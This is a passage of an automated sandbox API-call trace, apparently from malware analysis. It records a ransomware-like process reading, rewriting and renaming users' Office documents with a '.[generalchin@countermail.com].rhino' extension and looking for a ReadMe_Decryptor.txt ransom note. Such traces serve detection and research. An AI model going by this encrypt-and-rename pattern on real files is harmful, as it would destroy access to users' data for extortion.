(HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x75be98 [0105.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75bdb8 | out: hHeap=0x6d0000) returned 1 [0105.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x7a4db0 [0105.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75be98 | out: hHeap=0x6d0000) returned 1 [0105.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x75bd20 [0105.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a4db0 | out: hHeap=0x6d0000) returned 1 [0105.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x7a4db0 [0105.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75bd20 | out: hHeap=0x6d0000) returned 1 [0105.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x7a51e8 [0105.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a4db0 | out: hHeap=0x6d0000) returned 1 [0105.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x7a5830 [0105.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a51e8 | out: hHeap=0x6d0000) returned 1 [0105.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x7a6198 [0105.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a5830 | out: hHeap=0x6d0000) returned 1 [0105.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x7a6fb0 [0105.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a6198 | out: hHeap=0x6d0000) returned 1 [0105.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x7a4db0 [0105.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a6fb0 | out: hHeap=0x6d0000) returned 1 [0105.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x7a6d78 [0105.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a4db0 | out: hHeap=0x6d0000) returned 1 [0105.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x71a658 [0105.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a6d78 | out: hHeap=0x6d0000) returned 1 [0105.876] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x7a4db0 [0105.876] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a658 | out: hHeap=0x6d0000) returned 1 [0105.876] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x71a658 [0105.876] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a4db0 | out: hHeap=0x6d0000) returned 1 [0105.877] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x23c7440 [0105.878] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a658 | out: hHeap=0x6d0000) returned 1 [0105.878] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x23d6478 [0105.880] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23c7440 | out: hHeap=0x6d0000) returned 1 [0105.880] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21c32) returned 0x24b0048 [0105.885] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23d6478 | out: hHeap=0x6d0000) returned 1 [0105.885] WriteFile (in: hFile=0x118, lpBuffer=0x24b0060*, nNumberOfBytesToWrite=0x174eb, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x24b0060*, lpNumberOfBytesWritten=0x292f304*=0x174eb, lpOverlapped=0x0) returned 1 [0105.886] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0105.886] UnlockFile (hFile=0x118, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x174eb, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0105.886] CloseHandle (hObject=0x118) returned 1 [0105.888] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0690 [0105.888] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75bd20 [0105.888] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0690 | out: hHeap=0x6d0000) returned 1 [0105.888] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bfc017GN5tmh.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bfc017gn5tmh.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bfc017GN5tmh.pptx.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bfc017gn5tmh.pptx.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0105.944] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75bd20 | out: hHeap=0x6d0000) returned 1 [0106.013] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75bb98 | out: hHeap=0x6d0000) returned 1 [0106.013] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0106.014] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x77d400 [0106.014] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d038 | out: hHeap=0x6d0000) returned 1 [0106.014] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x77d038 [0106.014] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x7a7648 [0106.014] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d038 | out: hHeap=0x6d0000) returned 1 [0106.014] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9b50 [0106.014] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a7648 | out: hHeap=0x6d0000) returned 1 [0106.014] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0106.015] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9b50 | out: hHeap=0x6d0000) returned 1 [0106.015] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c1J1Vr7hWq.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c1j1vr7hwq.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0106.015] GetFileSize (in: hFile=0x224, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0x2bea [0106.015] LockFile (hFile=0x224, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x2d0a, nNumberOfBytesToLockHigh=0x0) returned 1 [0106.015] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.015] ReadFile (in: hFile=0x224, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0106.017] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.017] ReadFile (in: hFile=0x224, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x2bea, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x2bea, lpOverlapped=0x0) returned 1 [0106.017] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b9e8 [0106.018] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9e8 | out: hHeap=0x6d0000) returned 1 [0106.018] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x7a27c0 [0106.018] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7d38 [0106.018] GetLastError () returned 0x0 [0106.018] SetLastError (dwErrCode=0x0) [0106.018] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a27c0 | out: hHeap=0x6d0000) returned 1 [0106.018] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c0d) returned 0x7a95b0 [0106.018] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7d38 | out: hHeap=0x6d0000) returned 1 [0106.018] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0648 [0106.018] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75bb98 [0106.018] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0648 | out: hHeap=0x6d0000) returned 1 [0106.018] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.019] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b9e8 [0106.019] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b9f8 [0106.019] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9e8 | out: hHeap=0x6d0000) returned 1 [0106.019] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b9e8 [0106.019] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9f8 | out: hHeap=0x6d0000) returned 1 [0106.019] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b9f8 [0106.019] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9e8 | out: hHeap=0x6d0000) returned 1 [0106.019] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b9e8 [0106.019] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9f8 | out: hHeap=0x6d0000) returned 1 [0106.019] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x754418 [0106.019] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9e8 | out: hHeap=0x6d0000) returned 1 [0106.019] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x754400 [0106.019] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x754418 | out: hHeap=0x6d0000) returned 1 [0106.019] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x75b368 [0106.019] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x754400 | out: hHeap=0x6d0000) returned 1 [0106.019] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x757658 [0106.019] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b368 | out: hHeap=0x6d0000) returned 1 [0106.019] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x7a27c0 [0106.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757658 | out: hHeap=0x6d0000) returned 1 [0106.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7d38 [0106.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a27c0 | out: hHeap=0x6d0000) returned 1 [0106.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef4a0 [0106.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7d38 | out: hHeap=0x6d0000) returned 1 [0106.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x75bd20 [0106.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef4a0 | out: hHeap=0x6d0000) returned 1 [0106.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x7ac1c8 [0106.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75bd20 | out: hHeap=0x6d0000) returned 1 [0106.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x7ac2a8 [0106.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7ac1c8 | out: hHeap=0x6d0000) returned 1 [0106.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x7ac3f0 [0106.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7ac2a8 | out: hHeap=0x6d0000) returned 1 [0106.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x7ac5d8 [0106.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7ac3f0 | out: hHeap=0x6d0000) returned 1 [0106.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x7ac8a8 [0106.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7ac5d8 | out: hHeap=0x6d0000) returned 1 [0106.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x7ac1c8 [0106.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7ac8a8 | out: hHeap=0x6d0000) returned 1 [0106.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x7ac810 [0106.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7ac1c8 | out: hHeap=0x6d0000) returned 1 [0106.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x71a658 [0106.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7ac810 | out: hHeap=0x6d0000) returned 1 [0106.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x7ac1c8 [0106.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a658 | out: hHeap=0x6d0000) returned 1 [0106.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x71a658 [0106.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7ac1c8 | out: hHeap=0x6d0000) returned 1 [0106.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x71c620 [0106.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a658 | out: hHeap=0x6d0000) returned 1 [0106.025] WriteFile (in: hFile=0x224, lpBuffer=0x71c640*, nNumberOfBytesToWrite=0x2d0a, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x71c640*, lpNumberOfBytesWritten=0x292f304*=0x2d0a, lpOverlapped=0x0) returned 1 [0106.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c620 | out: hHeap=0x6d0000) returned 1 [0106.026] UnlockFile (hFile=0x224, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x2d0a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0106.026] CloseHandle (hObject=0x224) returned 1 [0106.028] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x79fdc8 [0106.028] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75bd20 [0106.028] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x79fdc8 | out: hHeap=0x6d0000) returned 1 [0106.029] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c1J1Vr7hWq.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c1j1vr7hwq.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c1J1Vr7hWq.xlsx.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c1j1vr7hwq.xlsx.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0106.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75bd20 | out: hHeap=0x6d0000) returned 1 [0106.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75bb98 | out: hHeap=0x6d0000) returned 1 [0106.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a95b0 | out: hHeap=0x6d0000) returned 1 [0106.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x77d038 [0106.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d400 | out: hHeap=0x6d0000) returned 1 [0106.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x77d400 [0106.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x7a7648 [0106.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d400 | out: hHeap=0x6d0000) returned 1 [0106.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9b50 [0106.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a7648 | out: hHeap=0x6d0000) returned 1 [0106.030] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0106.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9b50 | out: hHeap=0x6d0000) returned 1 [0106.030] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cG9Y_mfr-.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg9y_mfr-.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0106.031] GetFileSize (in: hFile=0x224, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0xbbeb [0106.031] LockFile (hFile=0x224, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xbd0b, nNumberOfBytesToLockHigh=0x0) returned 1 [0106.031] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.031] ReadFile (in: hFile=0x224, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0106.032] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.033] ReadFile (in: hFile=0x224, lpBuffer=0x2b80040, nNumberOfBytesToRead=0xbbeb, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0xbbeb, lpOverlapped=0x0) returned 1 [0106.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b9e8 [0106.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9e8 | out: hHeap=0x6d0000) returned 1 [0106.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x7a27c0 [0106.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7d38 [0106.033] GetLastError () returned 0x0 [0106.033] SetLastError (dwErrCode=0x0) [0106.034] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a27c0 | out: hHeap=0x6d0000) returned 1 [0106.034] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbc0e) returned 0x71a658 [0106.034] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7d38 | out: hHeap=0x6d0000) returned 1 [0106.034] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0648 [0106.035] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75bb98 [0106.035] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0648 | out: hHeap=0x6d0000) returned 1 [0106.035] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.035] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b9e8 [0106.035] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b9f8 [0106.035] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9e8 | out: hHeap=0x6d0000) returned 1 [0106.035] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b9e8 [0106.035] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9f8 | out: hHeap=0x6d0000) returned 1 [0106.035] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b9f8 [0106.035] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9e8 | out: hHeap=0x6d0000) returned 1 [0106.035] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b9e8 [0106.035] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9f8 | out: hHeap=0x6d0000) returned 1 [0106.035] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x754400 [0106.035] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9e8 | out: hHeap=0x6d0000) returned 1 [0106.035] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x754418 [0106.035] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x754400 | out: hHeap=0x6d0000) returned 1 [0106.035] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x75b368 [0106.035] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x754418 | out: hHeap=0x6d0000) returned 1 [0106.035] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x757658 [0106.036] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b368 | out: hHeap=0x6d0000) returned 1 [0106.036] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x7a27c0 [0106.036] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757658 | out: hHeap=0x6d0000) returned 1 [0106.036] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7d38 [0106.036] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a27c0 | out: hHeap=0x6d0000) returned 1 [0106.036] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef4a0 [0106.036] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7d38 | out: hHeap=0x6d0000) returned 1 [0106.036] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x75bd20 [0106.036] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef4a0 | out: hHeap=0x6d0000) returned 1 [0106.036] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x726270 [0106.036] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75bd20 | out: hHeap=0x6d0000) returned 1 [0106.036] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x726350 [0106.036] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x726270 | out: hHeap=0x6d0000) returned 1 [0106.036] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x726498 [0106.036] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x726350 | out: hHeap=0x6d0000) returned 1 [0106.036] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x726680 [0106.036] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x726498 | out: hHeap=0x6d0000) returned 1 [0106.036] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x726950 [0106.036] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x726680 | out: hHeap=0x6d0000) returned 1 [0106.037] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x726270 [0106.037] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x726950 | out: hHeap=0x6d0000) returned 1 [0106.037] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x7268b8 [0106.037] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x726270 | out: hHeap=0x6d0000) returned 1 [0106.037] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x727220 [0106.037] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7268b8 | out: hHeap=0x6d0000) returned 1 [0106.037] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x728038 [0106.037] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x727220 | out: hHeap=0x6d0000) returned 1 [0106.037] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x7a95b0 [0106.037] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x728038 | out: hHeap=0x6d0000) returned 1 [0106.037] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x726270 [0106.037] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a95b0 | out: hHeap=0x6d0000) returned 1 [0106.037] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x7a95b0 [0106.037] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x726270 | out: hHeap=0x6d0000) returned 1 [0106.037] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x23b0048 [0106.040] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a95b0 | out: hHeap=0x6d0000) returned 1 [0106.040] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x23b6b28 [0106.040] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0106.041] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x23c0b58 [0106.042] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b6b28 | out: 